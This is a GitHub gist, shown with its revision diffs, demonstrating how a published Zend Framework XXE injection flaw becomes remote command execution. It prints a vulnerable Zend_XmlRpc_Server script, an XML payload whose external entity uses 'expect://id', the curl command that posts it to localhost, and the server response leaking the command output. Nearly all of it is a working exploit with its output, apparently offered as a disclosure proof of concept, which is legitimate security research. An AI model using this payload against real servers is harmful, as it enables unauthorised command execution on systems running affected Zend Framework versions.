Skip to content

Instantly share code, notes, and snippets.

@joernchen

joernchen/gist:3623896

Created September 4, 2012 17:34
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save joernchen/3623896 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save joernchen/3623896 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. joernchen revised this gist Sep 4, 2012. 1 changed file with 5 additions and 2 deletions.
    7 changes: 5 additions & 2 deletions gistfile1.txt
    View file
    Original file line number Diff line number Diff line change
    @@ -19,5 +19,8 @@ joern@vbox-1:/tmp$ cat payload
    </methodCall>
    joern@vbox-1:/tmp$ curl http://localhost/server.php -d @payload
    <?xml version="1.0" encoding="UTF-8"?>
    <methodResponse><fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value><string>Method &quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)
    &quot; does not exist</string></value></member></struct></value></fault></methodResponse>joern@vbox-1:/tmp$
    <methodResponse>
    <fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value>
    <string>Method &quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)
    &quot; does not exist</string>
    </value></member></struct></value></fault></methodResponse>joern@vbox-1:/tmp$
  2. joernchen created this gist Sep 4, 2012.
    23 changes: 23 additions & 0 deletions gistfile1.txt
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,23 @@
    This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
    into a Remote Command Execution:

    NOTE: It relies on the PHP expect module being loaded
    (see http://de.php.net/manual/en/book.expect.php)

    joern@vbox-1:/tmp$ cat /var/www/server.php
    <?
    require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
    Zend_Loader_Autoloader::getInstance();
    $server = new Zend_XmlRpc_Server();
    echo $server->handle();

    ?>
    joern@vbox-1:/tmp$ cat payload
    <!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]>
    <methodCall>
    <methodName>&foo;</methodName>
    </methodCall>
    joern@vbox-1:/tmp$ curl http://localhost/server.php -d @payload
    <?xml version="1.0" encoding="UTF-8"?>
    <methodResponse><fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value><string>Method &quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)
    &quot; does not exist</string></value></member></struct></value></fault></methodResponse>joern@vbox-1:/tmp$